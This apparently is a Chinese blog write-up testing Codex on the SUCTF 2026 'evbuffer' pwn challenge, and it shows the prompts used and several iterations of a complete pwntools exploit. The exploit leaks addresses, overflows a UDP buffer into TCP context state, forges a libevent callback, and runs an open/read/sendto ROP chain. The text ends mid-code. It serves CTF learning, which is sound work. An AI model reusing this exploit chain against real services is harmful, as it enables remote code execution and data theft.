1. 前言
LLM对于各行各业都带来了提升,ctf也不例外;但是llm究竟能对ctf,或者对安全提升的边界在哪里?llm是否会直接淘汰安全研究人员?新时代安全研究员如何利用llm提高自身能力且保证自己的不可替代性?要想回答这些问题,还是需要实践一下,分析llm现在的安全能力到底如何。
2. LLM选型: Codex
没有其他原因,只是因为codex允许我用,antigravity和claude都把我否了。
2.1 codex配置ida mcp
https://github.com/mrexodia/ida-pro-mcp
也可以参考IDAPro–MCP详细配置教程
保护全开。
3. SUCTF 2026:evbuffer
以一道题目为例,探索一下codex对于pwn题的能力分析:
3.1 安全保护机制

3.2 在已有题目环境基础下,给出docker pwn调试教程
https://pwndbg.re/stable/setup/#portable-release
下给出了一键式安装的步骤,仅需要在dockerfile中添加如下内容:
RUN apt-get install -y lib32z1 libevent-2.1-7 libseccomp2 git gdb curl xz-utils
RUN curl --proto '=https' --tlsv1.2 -LsSf 'https://install.pwndbg.re' | sh -s -- -t pwndbg-gdb
启动容器时,记得添加ptrace权限:
docker run --cap-add=SYS_PTRACE -d -p "0.0.0.0:8888:8888" -p "0.0.0.0:8889:8889/udp" -h "pwn" --name="pwn" --restart always suctf_evbuffer:pwn1
docker exec -u 0 -it IMAGE_ID bash
3.3 codex分析
我给codex下了如下命令:
使用ida的mcp功能,分析该二进制文件,梳理程序执行逻辑,找到漏洞,并写出exp脚本
codex返回的结果如下:

首先,codex只执行了前半部分,分析二进制文件梳理逻辑并找到漏洞,并没有给出exp脚本
另外没有人工先验知识的情况下,要分析AI说的是对是错太困难了,我给它下了另一个指令:
根据你的结论,对一些sub_xxx函数重新命名


把.bss段的全局对象也重命名,并添加注释

分析完后,可以得到codex分析的先验知识:
这是一个接受tcp/udp报文并处理的程序,使用的是lib_event库。
3.3.1 POC
我希望ai能够做出这道题目,于是给他下了其他命令:
现在这个环境可以访问,ip地址为127.0.0.1:8888和127.0.0.1:8889,请写出你的poc
实测POC是能触发程序崩溃的。
3.3.2 更进一步:exp

地址泄露是正常的,但是代码其实写的并不友好,不方便定位错误:
#!/usr/bin/env python3
from pwn import *
context.binary = ELF("./pwn", checksec=False)
elf = context.binary
libc = ELF("./libc.so.6", checksec=False)
context.arch = elf.arch
context.os = elf.os
context.log_level = args.LOG_LEVEL or "info"
HOST = "127.0.0.1"
PORT_TCP = int(args.TCP_PORT or 8888)
PORT_UDP = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)
# Leak/layout offsets recovered from the target binary and verified in gdb.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
STACK_BUF_DELTA = 0x3D0
PIE_LEAK_RET_OFF = 0x1619
CALL_SENDTO_OFF = 0x154A
# The challenge environment appears to keep libc at a fixed offset from libevent.
# The provided VM/docker layout uses 0x249000; some other local setups use 0x367000.
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)
def start_tcp():
return remote(HOST, PORT_TCP, typ="tcp")
def start_udp():
return remote(HOST, PORT_UDP, typ="udp")
def choose_heap_candidate(leak: bytes) -> int:
candidates = [u64(leak[0x28:0x30]), u64(leak[0x30:0x38])]
userland = [x for x in candidates if 0x100000000000 <= x < 0x800000000000]
if userland:
chosen = max(userland)
log.info("heap candidates = %s, chosen = %#x", [hex(x) for x in candidates], chosen)
return chosen
chosen = candidates[-1]
log.warning("heap leak looked odd, falling back to %#x", chosen)
return chosen
def leak_state():
ip = b"0.0.0.0\x00"
io_tcp = start_tcp()
io_tcp.send(ip)
leak_tcp = io_tcp.recvn(0x50)
leaked_libevent = u64(leak_tcp[0x18:0x20])
leaked_heap = choose_heap_candidate(leak_tcp)
libevent_base = leaked_libevent - LIBEVENT_LEAK_OFF
libc_base = libevent_base - LIBC_FROM_LIBEVENT
global_event_base = leaked_heap - GLOBAL_EVENT_BASE_DELTA
log.info("leaked_libevent = %#x", leaked_libevent)
log.info("libevent_base = %#x", libevent_base)
log.info("libc_base = %#x", libc_base)
log.info("global_event_base= %#x", global_event_base)
io_udp = start_udp()
io_udp.send(ip)
leak_udp = io_udp.recvn(0x50)
leaked_stack = u64(leak_udp[0x40:0x48])
leaked_pie = u64(leak_udp[0x48:0x50])
pie_base = leaked_pie - PIE_LEAK_RET_OFF
stack_buf = leaked_stack - STACK_BUF_DELTA
log.info("leaked_stack = %#x", leaked_stack)
log.info("stack_buf = %#x", stack_buf)
log.info("pie_base = %#x", pie_base)
return {
"ip": ip,
"io_tcp": io_tcp,
"io_udp": io_udp,
"libc_base": libc_base,
"pie_base": pie_base,
"stack_buf": stack_buf,
"global_event_base": global_event_base,
}
def build_rop(libc_base: int, pie_base: int, stack_buf: int) -> bytes:
rop = ROP(libc)
pop_rdi = libc_base + rop.find_gadget(["pop rdi", "ret"]).address
pop_rsi = libc_base + rop.find_gadget(["pop rsi", "ret"]).address
pop_rax = libc_base + rop.find_gadget(["pop rax", "ret"]).address
pop_rdx_rbp_r12 = libc_base + rop.find_gadget(["pop rdx", "pop rbp", "pop r12", "ret"]).address
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
call_sendto = pie_base + CALL_SENDTO_OFF
fake_bev_addr = stack_buf + 0x80
rop_addr = fake_bev_addr + 0x120
chain = flat(
pop_rdi,
stack_buf + 0x10, # "/flag"
pop_rsi,
0,
open_addr,
pop_rdi,
READ_FD, # open() return value in the provided env
pop_rsi,
stack_buf + 0x18,
pop_rdx_rbp_r12,
0x100,
0,
0,
read_addr,
pop_rdx_rbp_r12,
stack_buf - 0x10, # saved UDP sockaddr on udp_read_cb stack
0,
0,
pop_rax,
UDP_FD, # UDP socket fd in the provided env
pop_rsi,
stack_buf + 0x18,
call_sendto,
)
return chain, fake_bev_addr, mov_rsp_rdx
def build_fake_bufferevent(fake_bev_addr: int, mov_rsp_rdx: int) -> bytes:
fake_callbacks_addr = fake_bev_addr + 0x80
rop_addr = fake_bev_addr + 0x120
fake = flat(
0, # evbuffer.first
0, # evbuffer.last
fake_bev_addr, # evbuffer.last_with_datap -> self
rop_addr - 0x50, # gets carried into rdx before cb call
rop_addr - 0x50, # scratch field used on the same path
fake_bev_addr, # scratch/self
)
fake = fake.ljust(0x78, b"\x00")
# evbuffer.callbacks LIST_HEAD + inline fake evbuffer_cb_entry.
fake += flat(
fake_callbacks_addr, # callbacks.lh_first
0, # entry.next.le_next
0, # entry.next.le_prev
mov_rsp_rdx, # entry.cb.cb_func
0, # entry.cbarg
0x40001, # entry.flags
0,
)
fake = fake.ljust(0x118, b"\x00")
fake += p64(fake_bev_addr) # fake bufferevent.output
return fake
def build_payload(ip: bytes, stack_buf: int, global_event_base: int, fake_bev_addr: int, fake_bev: bytes, rop_chain: bytes) -> bytes:
payload = ip.ljust(0x10, b"\x00")
payload += FILE_PATH
payload = payload.ljust(0x58, b"\x00")
# Overwrite tcp_io_ctx_{use_bev, bev, fd} and global_event_base.
payload += flat(
1,
fake_bev_addr,
0,
global_event_base,
)
payload = payload.ljust(0x80, b"\x00")
payload += fake_bev
payload += rop_chain
return payload
def exploit():
state = leak_state()
rop_chain, fake_bev_addr, mov_rsp_rdx = build_rop(
state["libc_base"], state["pie_base"], state["stack_buf"]
)
fake_bev = build_fake_bufferevent(fake_bev_addr, mov_rsp_rdx)
payload = build_payload(
state["ip"],
state["stack_buf"],
state["global_event_base"],
fake_bev_addr,
fake_bev,
rop_chain,
)
log.info("fake_bev_addr = %#x", fake_bev_addr)
log.info("mov_rsp_rdx = %#x", mov_rsp_rdx)
log.info("payload_len = %#x", len(payload))
log.info("FILE_PATH = %r", FILE_PATH)
log.info("READ_FD / UDP_FD = %d / %d", READ_FD, UDP_FD)
if args.PAUSE:
pause()
state["io_udp"].send(payload)
state["io_tcp"].send(state["ip"])
data = state["io_udp"].recv(timeout=2)
if data:
log.success("received %d bytes back over UDP", len(data))
print(data)
else:
log.warning("no immediate UDP response; switching to interactive mode")
state["io_udp"].interactive()
if __name__ == "__main__":
exploit()
重新发送指令:
请更改代码,添加注释,使其更易阅读和理解。

#!/usr/bin/env python3
from pwn import *
# This exploit uses the bug in handle_ip_request():
# 1. trigger normal TCP/UDP replies to leak runtime addresses;
# 2. place a fake bufferevent/evbuffer on the UDP callback stack;
# 3. overwrite tcp_io_ctx so the next TCP request uses our fake object;
# 4. pivot into a ROP chain that performs open/read/sendto.
context.binary = ELF("./pwn", checksec=False)
elf = context.binary
libc = ELF("./libc.so.6", checksec=False)
context.arch = elf.arch
context.os = elf.os
context.log_level = args.LOG_LEVEL or "info"
HOST = args.HOST or "192.168.62.130"
PORT_TCP = int(args.TCP_PORT or 8888)
PORT_UDP = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)
# Layout/constants recovered from reversing the main binary and confirmed in gdb.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
STACK_BUF_DELTA = 0x3D0
PIE_LEAK_RET_OFF = 0x1619
CALL_SENDTO_OFF = 0x154A
# The challenge environment appears to keep libc at a fixed offset from libevent.
# The provided VM/docker layout uses 0x249000; some other local setups use 0x367000.
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)
# Offsets inside the UDP overflow region. The UDP path writes into udp_io_ctx at 0x4040
# and overflows forward into tcp_io_ctx at 0x4078.
OVERFLOW_TO_TCP_CTX = 0x38
OVERFLOW_TO_TCP_USE_BEV = OVERFLOW_TO_TCP_CTX + 0x20
# Offsets inside struct bufferevent / evbuffer used by the fake object.
FAKE_BEV_OUTPUT_OFF = 0x118
FAKE_EVB_CALLBACKS_OFF = 0x78
def build_ip_request_blob() -> bytes:
# The service first runs inet_pton() on the input, so every trigger packet
# must begin with a valid IPv4 string followed by a NUL terminator.
return b"0.0.0.0\x00"
def start_tcp():
return remote(HOST, PORT_TCP, typ="tcp")
def start_udp():
return remote(HOST, PORT_UDP, typ="udp")
def choose_heap_candidate(leak: bytes) -> int:
# Different environments may place a useful heap pointer at slightly different
# offsets inside the 0x50-byte hostname reply. Keep both known candidates and
# pick the one that looks like a canonical userland address.
candidates = [u64(leak[0x28:0x30]), u64(leak[0x30:0x38])]
userland = [x for x in candidates if 0x100000000000 <= x < 0x800000000000]
if userland:
chosen = max(userland)
log.info("heap candidates = %s, chosen = %#x", [hex(x) for x in candidates], chosen)
return chosen
chosen = candidates[-1]
log.warning("heap leak looked odd, falling back to %#x", chosen)
return chosen
def leak_state():
ip = build_ip_request_blob()
# Stage 1a: use the legitimate TCP response path to leak libevent/heap pointers.
io_tcp = start_tcp()
io_tcp.send(ip)
leak_tcp = io_tcp.recvn(0x50)
leaked_libevent = u64(leak_tcp[0x18:0x20])
leaked_heap = choose_heap_candidate(leak_tcp)
libevent_base = leaked_libevent - LIBEVENT_LEAK_OFF
libc_base = libevent_base - LIBC_FROM_LIBEVENT
global_event_base = leaked_heap - GLOBAL_EVENT_BASE_DELTA
log.info("leaked_libevent = %#x", leaked_libevent)
log.info("libevent_base = %#x", libevent_base)
log.info("libc_base = %#x", libc_base)
log.info("global_event_base= %#x", global_event_base)
# Stage 1b: use the legitimate UDP response path to leak a stack pointer and
# a PIE return address from udp_read_cb().
io_udp = start_udp()
io_udp.send(ip)
leak_udp = io_udp.recvn(0x50)
leaked_stack = u64(leak_udp[0x40:0x48])
leaked_pie = u64(leak_udp[0x48:0x50])
pie_base = leaked_pie - PIE_LEAK_RET_OFF
stack_buf = leaked_stack - STACK_BUF_DELTA
log.info("leaked_stack = %#x", leaked_stack)
log.info("stack_buf = %#x", stack_buf)
log.info("pie_base = %#x", pie_base)
return {
"ip": ip,
"io_tcp": io_tcp,
"io_udp": io_udp,
"libc_base": libc_base,
"pie_base": pie_base,
"stack_buf": stack_buf,
"global_event_base": global_event_base,
}
def build_rop(libc_base: int, pie_base: int, stack_buf: int):
# The final ROP chain lives on the UDP callback stack, right after the fake
# bufferevent object. A fake evbuffer callback pivots rsp into this chain.
rop = ROP(libc)
pop_rdi = libc_base + rop.find_gadget(["pop rdi", "ret"]).address
pop_rsi = libc_base + rop.find_gadget(["pop rsi", "ret"]).address
pop_rax = libc_base + rop.find_gadget(["pop rax", "ret"]).address
pop_rdx_rbp_r12 = libc_base + rop.find_gadget(["pop rdx", "pop rbp", "pop r12", "ret"]).address
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
call_sendto = pie_base + CALL_SENDTO_OFF
# The fake object is placed inside the overflown UDP stack buffer.
fake_bev_addr = stack_buf + 0x80
rop_addr = fake_bev_addr + FAKE_BEV_OUTPUT_OFF + 8
chain = flat(
pop_rdi,
stack_buf + 0x10, # FILE_PATH copied into the start of the UDP buffer
pop_rsi,
0,
open_addr,
pop_rdi,
READ_FD, # expected fd returned by open() in this environment
pop_rsi,
stack_buf + 0x18,
pop_rdx_rbp_r12,
0x100,
0,
0,
read_addr,
pop_rdx_rbp_r12,
stack_buf - 0x10, # sockaddr saved by recvfrom() in udp_read_cb()
0,
0,
pop_rax,
UDP_FD, # UDP socket fd in the provided env
pop_rsi,
stack_buf + 0x18,
call_sendto,
)
return chain, fake_bev_addr, mov_rsp_rdx
def build_fake_bufferevent(fake_bev_addr: int, mov_rsp_rdx: int) -> bytes:
# fake_bev doubles as a fake evbuffer because bufferevent_get_output()
# returns bev->output, and handle_ip_request() immediately passes that
# pointer into evbuffer_add_reference().
fake_callbacks_addr = fake_bev_addr + FAKE_EVB_CALLBACKS_OFF
rop_addr = fake_bev_addr + FAKE_BEV_OUTPUT_OFF + 8
fake = flat(
0, # evbuffer.first
0, # evbuffer.last
fake_bev_addr, # evbuffer.last_with_datap -> self
rop_addr - 0x50, # later propagated into rdx before the callback
rop_addr - 0x50, # scratch field touched on the same path
fake_bev_addr, # scratch/self
)
fake = fake.ljust(FAKE_EVB_CALLBACKS_OFF, b"\x00")
# Fake evbuffer.callbacks LIST_HEAD + one inline evbuffer_cb_entry.
# The callback body is a tiny gadget: mov rsp, rdx ; ret.
fake += flat(
fake_callbacks_addr, # callbacks.lh_first
0, # entry.next.le_next
0, # entry.next.le_prev
mov_rsp_rdx, # entry.cb.cb_func
0, # entry.cbarg
0x40001, # entry.flags
0,
)
fake = fake.ljust(FAKE_BEV_OUTPUT_OFF, b"\x00")
fake += p64(fake_bev_addr) # fake bufferevent.output -> fake evbuffer
return fake
def build_payload(
ip: bytes,
stack_buf: int,
global_event_base: int,
fake_bev_addr: int,
fake_bev: bytes,
rop_chain: bytes,
) -> bytes:
# The payload is copied by the UDP path into udp_io_ctx and then continues
# overflowing forward into tcp_io_ctx. The same bytes also remain on the UDP
# stack, which is why we can later pivot into the fake object/ROP chain.
payload = ip.ljust(0x10, b"\x00")
payload += FILE_PATH
payload = payload.ljust(OVERFLOW_TO_TCP_USE_BEV, b"\x00")
# Overwrite:
# tcp_io_ctx_use_bev -> 1, so the next TCP request goes through bev->output;
# tcp_io_ctx_bev -> fake_bev on the UDP stack;
# tcp_io_ctx_fd -> unused here;
# global_event_base -> preserved to avoid destabilizing libevent.
payload += flat(
1,
fake_bev_addr,
0,
global_event_base,
)
payload = payload.ljust(0x80, b"\x00")
payload += fake_bev
payload += rop_chain
return payload
def exploit():
# Stage 1: gather the addresses needed to place the fake object and ROP chain.
state = leak_state()
# Stage 2: build the fake libevent object and the ORW/sendto ROP chain.
rop_chain, fake_bev_addr, mov_rsp_rdx = build_rop(
state["libc_base"], state["pie_base"], state["stack_buf"]
)
fake_bev = build_fake_bufferevent(fake_bev_addr, mov_rsp_rdx)
payload = build_payload(
state["ip"],
state["stack_buf"],
state["global_event_base"],
fake_bev_addr,
fake_bev,
rop_chain,
)
log.info("fake_bev_addr = %#x", fake_bev_addr)
log.info("mov_rsp_rdx = %#x", mov_rsp_rdx)
log.info("payload_len = %#x", len(payload))
log.info("FILE_PATH = %r", FILE_PATH)
log.info("READ_FD / UDP_FD = %d / %d", READ_FD, UDP_FD)
if args.PAUSE:
pause()
# Stage 3: send the UDP overflow first, then a short TCP request to consume
# tcp_io_ctx_bev and drive execution into bufferevent_get_output(fake_bev).
state["io_udp"].send(payload)
state["io_tcp"].send(state["ip"])
data = state["io_udp"].recv(timeout=2)
if data:
log.success("received %d bytes back over UDP", len(data))
print(data)
else:
log.warning("no immediate UDP response; switching to interactive mode")
state["io_udp"].interactive()
if __name__ == "__main__":
exploit()
写出的代码易读了很多,方便我们做修改
现在开始debug吧,原本是想自己先写一版人工脚本,但是转念一想,以后肯定是ai+人来打比赛和学习了,在ai的基础上修改是必要技能,遂放弃人工的想法。
利用后发现程序没有回显,这倒是正常,重点在于如何调试发现问题,并解决。
3.3.3 exp调试
调试需要按照codex给出完整思路,并按照思路编排代码,这样是方便调试的(否则一时间也很难看懂问题发生在哪里:
首先是重新生成一份代码,payload是按利用顺序来构造的
修改后的payload构造如下:
后续调试只需要改payload发就行:
#!/usr/bin/env python3
import socket
from pwn import *
context.binary = ELF("./pwn", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
context.arch = "amd64"
context.os = "linux"
context.log_level = args.LOG_LEVEL or "info"
HOST = args.HOST or "192.168.62.130"
TCP_PORT = int(args.TCP_PORT or 8888)
UDP_PORT = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)
# Offsets confirmed during reversing / debugging.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
PIE_LEAK_RET_OFF = 0x1619
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)
CALL_SENDTO_OFF = 0x154A
UDP_IO_CTX_OFF = 0x4040
OVERFLOW_TO_TCP_USE_BEV = 0x58
BSS_FAKE_BEV_OFF = 0x40C0
BSS_PATH_OFF = 0x41F0
BSS_READ_BUF_OFF = 0x4200
BSS_SOCKADDR_OFF = 0x4300
BSS_ROP_OFF = 0x4320
FAKE_EVB_CALLBACKS_OFF = 0x78
FAKE_BEV_OUTPUT_OFF = 0x118
def request_blob() -> bytes:
return b"0.0.0.0\x00"
def choose_heap_candidate(reply: bytes) -> int:
candidates = [u64(reply[0x28:0x30]), u64(reply[0x30:0x38])]
userland = [x for x in candidates if 0x100000000000 <= x < 0x800000000000]
return max(userland) if userland else candidates[-1]
def open_channels():
tcp = remote(HOST, TCP_PORT, typ="tcp")
udp = remote(HOST, UDP_PORT, typ="udp")
return tcp, udp
def leak_all(tcp, udp):
blob = request_blob()
leaks = {}
tcp.send(blob)
reply = tcp.recvn(0x50)
leaked_libevent = u64(reply[0x18:0x20])
leaked_heap = choose_heap_candidate(reply)
libevent_base = leaked_libevent - LIBEVENT_LEAK_OFF
leaks["tcp_reply"] = reply
leaks["leaked_libevent"] = leaked_libevent
leaks["libevent_base"] = libevent_base
leaks["libc_base"] = libevent_base - LIBC_FROM_LIBEVENT
leaks["leaked_heap"] = leaked_heap
leaks["global_event_base"] = leaked_heap - GLOBAL_EVENT_BASE_DELTA
udp.send(blob)
reply = udp.recvn(0x50)
leaked_stack = u64(reply[0x40:0x48])
leaked_pie = u64(reply[0x48:0x50])
leaks["udp_reply"] = reply
leaks["leaked_stack"] = leaked_stack
leaks["leaked_pie_ret"] = leaked_pie
leaks["pie_base"] = leaked_pie - PIE_LEAK_RET_OFF
leaks["udp_peer"] = udp.sock.getsockname()
return leaks
def build_payload(leaks):
pie_base = leaks["pie_base"]
libc_base = leaks["libc_base"]
fake_bev_addr = pie_base + BSS_FAKE_BEV_OFF
path_addr = pie_base + BSS_PATH_OFF
read_buf_addr = pie_base + BSS_READ_BUF_OFF
sockaddr_addr = pie_base + BSS_SOCKADDR_OFF
rop_addr = pie_base + BSS_ROP_OFF
rop = ROP(libc)
pop_rdi_g = sorted(
[
g
for g in rop.gadgets.values()
if g.insns
and g.insns[-1] == "ret"
and g.insns[0] == "pop rdi"
and all(insn.startswith("pop ") for insn in g.insns[:-1])
],
key=lambda g: len(g.insns),
)[0]
pop_rsi_g = sorted(
[
g
for g in rop.gadgets.values()
if g.insns
and g.insns[-1] == "ret"
and g.insns[0] == "pop rsi"
and all(insn.startswith("pop ") for insn in g.insns[:-1])
],
key=lambda g: len(g.insns),
)[0]
pop_rax_g = sorted(
[
g
for g in rop.gadgets.values()
if g.insns
and g.insns[-1] == "ret"
and g.insns[0] == "pop rax"
and all(insn.startswith("pop ") for insn in g.insns[:-1])
],
key=lambda g: len(g.insns),
)[0]
pop_rdx_g = sorted(
[
g
for g in rop.gadgets.values()
if g.insns
and g.insns[-1] == "ret"
and g.insns[0] == "pop rdx"
and all(insn.startswith("pop ") for insn in g.insns[:-1])
],
key=lambda g: len(g.insns),
)[0]
pop_rdi = libc_base + pop_rdi_g.address
pop_rsi = libc_base + pop_rsi_g.address
pop_rax = libc_base + pop_rax_g.address
pop_rdx = libc_base + pop_rdx_g.address
pad_rdi = b"".join(p64(0) for _ in pop_rdi_g.insns[1:-1])
pad_rsi = b"".join(p64(0) for _ in pop_rsi_g.insns[1:-1])
pad_rax = b"".join(p64(0) for _ in pop_rax_g.insns[1:-1])
pad_rdx = b"".join(p64(0) for _ in pop_rdx_g.insns[1:-1])
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
call_sendto = pie_base + CALL_SENDTO_OFF
fake_evbuffer = b""
fake_evbuffer += p64(0)
fake_evbuffer += p64(0)
fake_evbuffer += p64(fake_bev_addr)
fake_evbuffer += p64(0)
fake_evbuffer += p64(0)
fake_evbuffer += p64(0)
fake_evbuffer += p64(0)
fake_evbuffer += p64(0)
fake_evbuffer = fake_evbuffer.ljust(FAKE_EVB_CALLBACKS_OFF, b"\x00")
fake_evbuffer += p64(fake_bev_addr + FAKE_EVB_CALLBACKS_OFF)
fake_evbuffer += p64(0)
fake_evbuffer += p64(0)
fake_evbuffer += p64(mov_rsp_rdx)
fake_evbuffer += p64(rop_addr)
fake_evbuffer += p64(1)
fake_evbuffer += p64(0)
fake_evbuffer = fake_evbuffer.ljust(FAKE_BEV_OUTPUT_OFF, b"\x00")
fake_evbuffer += p64(fake_bev_addr)
rop_region = b""
rop_region += FILE_PATH
rop_region = rop_region.ljust(BSS_SOCKADDR_OFF - BSS_PATH_OFF, b"\x00")
rop_region += p16(socket.AF_INET)
rop_region += p16(leaks["udp_peer"][1], endian="big")
rop_region += socket.inet_aton(leaks["udp_peer"][0])
rop_region += b"\x00" * 8
rop_region = rop_region.ljust(BSS_ROP_OFF - BSS_PATH_OFF, b"\x00")
rop_region += p64(pop_rdi) + p64(path_addr) + pad_rdi
rop_region += p64(pop_rsi) + p64(0) + pad_rsi
rop_region += p64(open_addr)
rop_region += p64(pop_rdi) + p64(READ_FD) + pad_rdi
rop_region += p64(pop_rsi) + p64(read_buf_addr) + pad_rsi
rop_region += p64(pop_rdx) + p64(0x100) + pad_rdx
rop_region += p64(read_addr)
rop_region += p64(pop_rdx) + p64(sockaddr_addr) + pad_rdx
rop_region += p64(pop_rax) + p64(UDP_FD) + pad_rax
rop_region += p64(pop_rsi) + p64(read_buf_addr) + pad_rsi
rop_region += p64(call_sendto)
payload = b""
payload += request_blob() # ip 4byte
payload = payload.ljust(OVERFLOW_TO_TCP_USE_BEV, b"\x00") # 84byte
payload += p64(1) # tcp_io_ctx_use_bev = 1
payload += p64(fake_bev_addr) # tcp_io_ctx_bev = fake_bev_addr 0x40c0+base
payload += p64(0) # tcp fd = 0
payload += p64(leaks["global_event_base"]) # global_event_base = global_event_base
payload = payload.ljust(BSS_FAKE_BEV_OFF - UDP_IO_CTX_OFF, b"\x00") # fill to 0x40c0
# fake bev:
output_addr = pie_base+0x41e0
fake_cb = output_addr + 0x80
pivot_stack = output_addr + 0xB0
payload += cyclic(280) # 0x40c0 payload
payload += p64(output_addr) # output_addr
#---output construction:0x41e0 payload : evbuffer
# 0x41e0: fake evbuffer. This is enough for
# evbuffer_add_reference() -> evbuffer_invoke_callbacks_() -> sub_EF40()
# to call fake_cb->cb_func(output, &info, fake_cb->cbarg).
payload += p64(0) # +0x00 first
payload += p64(0) # +0x08 last
payload += p64(output_addr) # +0x10 last_with_datap = &first
payload += p64(0) # +0x18 total_len
payload += p64(0) # +0x20 n_add_for_cb
payload += p64(0) # +0x28 n_del_for_cb
payload += p64(0) # +0x30 lock
payload += p64(0) # +0x38 flags: no freeze, no deferred callback
payload = payload.ljust((output_addr + 0x78) - (pie_base + UDP_IO_CTX_OFF), b"\x00")
payload += p64(fake_cb) # +0x78 callbacks.lh_first
payload += p64(0) # +0x80 cb_entry.next
payload += p64(0) # +0x88 cb_entry.prev
payload += p64(mov_rsp_rdx) # +0x90 cb_entry.cb_func
payload += p64(pivot_stack) # +0x98 cb_entry.cbarg -> rdx
payload += p64(1) # +0xa0 EVBUFFER_CB_ENABLED
payload = payload.ljust((pivot_stack) - (pie_base + UDP_IO_CTX_OFF), b"\x00")
payload += p64(0x4141414141414141)
# payload = payload.ljust(BSS_PATH_OFF - UDP_IO_CTX_OFF, b"\x00")
# payload += rop_region
return payload
def main():
tcp, udp = open_channels()
try:
leaks = leak_all(tcp, udp)
for name, value in leaks.items():
if isinstance(value, bytes):
log.info("%s (%#x bytes)", name, len(value))
print(hexdump(value))
elif isinstance(value, tuple):
log.success("%s = %s:%d", name, *value)
else:
log.success("%s = %#x", name, value)
payload = build_payload(leaks)
log.info("payload_len = %#x", len(payload))
#print(hexdump(payload))
udp.send(payload)
tcp.send(b"0.0.0.0\x00")
tcp.interactive()
finally:
if not args.INTERACTIVE:
tcp.close()
udp.close()
if __name__ == "__main__":
main()
上述代码由chatgpt5.5修改+人为修改,ai真的是有点东西的,这回能够走到劫持程序控制流了:

3.3.4 最终调试版
在上述代码的基础上,让ai在后续补上orw的rop链,最终完成调用:
#!/usr/bin/env python3
import socket
from pwn import *
context.binary = ELF("./pwn", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
context.arch = "amd64"
context.os = "linux"
context.log_level = args.LOG_LEVEL or "info"
HOST = args.HOST or "192.168.62.130"
TCP_PORT = int(args.TCP_PORT or 8888)
UDP_PORT = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)
TCP_FD = int(args.TCP_FD or 8)
# Offsets confirmed during reversing / debugging.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
PIE_LEAK_RET_OFF = 0x1619
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)
CALL_SENDTO_OFF = 0x154A
UDP_IO_CTX_OFF = 0x4040
OVERFLOW_TO_TCP_USE_BEV = 0x58
BSS_FAKE_BEV_OFF = 0x40C0
BSS_PATH_OFF = 0x41F0
BSS_READ_BUF_OFF = 0x4200
BSS_SOCKADDR_OFF = 0x4300
BSS_ROP_OFF = 0x4320
FAKE_EVB_CALLBACKS_OFF = 0x78
FAKE_BEV_OUTPUT_OFF = 0x118
def request_blob() -> bytes:
return b"0.0.0.0\x00"
def choose_heap_candidate(reply: bytes) -> int:
candidates = [u64(reply[0x28:0x30]), u64(reply[0x30:0x38])]
userland = [x for x in candidates if 0x100000000000 <= x < 0x800000000000]
return max(userland) if userland else candidates[-1]
def open_channels():
tcp = remote(HOST, TCP_PORT, typ="tcp")
udp = remote(HOST, UDP_PORT, typ="udp")
return tcp, udp
def leak_all(tcp, udp):
blob = request_blob()
leaks = {}
tcp.send(blob)
reply = tcp.recvn(0x50)
leaked_libevent = u64(reply[0x18:0x20])
leaked_heap = choose_heap_candidate(reply)
libevent_base = leaked_libevent - LIBEVENT_LEAK_OFF
leaks["tcp_reply"] = reply
leaks["leaked_libevent"] = leaked_libevent
leaks["libevent_base"] = libevent_base
leaks["libc_base"] = libevent_base - LIBC_FROM_LIBEVENT
leaks["leaked_heap"] = leaked_heap
leaks["global_event_base"] = leaked_heap - GLOBAL_EVENT_BASE_DELTA
udp.send(blob)
reply = udp.recvn(0x50)
leaked_stack = u64(reply[0x40:0x48])
leaked_pie = u64(reply[0x48:0x50])
leaks["udp_reply"] = reply
leaks["leaked_stack"] = leaked_stack
leaks["leaked_pie_ret"] = leaked_pie
leaks["pie_base"] = leaked_pie - PIE_LEAK_RET_OFF
leaks["udp_peer"] = udp.sock.getsockname()
return leaks
def pop_chain(rop, libc_base, reg, value):
choices = [
g
for g in rop.gadgets.values()
if g.insns
and g.insns[-1] == "ret"
and g.insns[0] == f"pop {reg}"
and all(insn.startswith("pop ") for insn in g.insns[:-1])
]
if not choices:
log.failure("missing pop %s gadget", reg)
raise SystemExit(1)
gadget = sorted(choices, key=lambda g: len(g.insns))[0]
extra_pops = len(gadget.insns) - 2
return p64(libc_base + gadget.address) + p64(value) + p64(0) * extra_pops
def build_payload(leaks):
pie_base = leaks["pie_base"]
libc_base = leaks["libc_base"]
fake_bev_addr = pie_base + BSS_FAKE_BEV_OFF
path_addr = pie_base + BSS_PATH_OFF
read_buf_addr = pie_base + BSS_READ_BUF_OFF
sockaddr_addr = pie_base + BSS_SOCKADDR_OFF
rop_addr = pie_base + BSS_ROP_OFF
rop = ROP(libc)
pop_rdi_g = sorted(
[
g
for g in rop.gadgets.values()
if g.insns
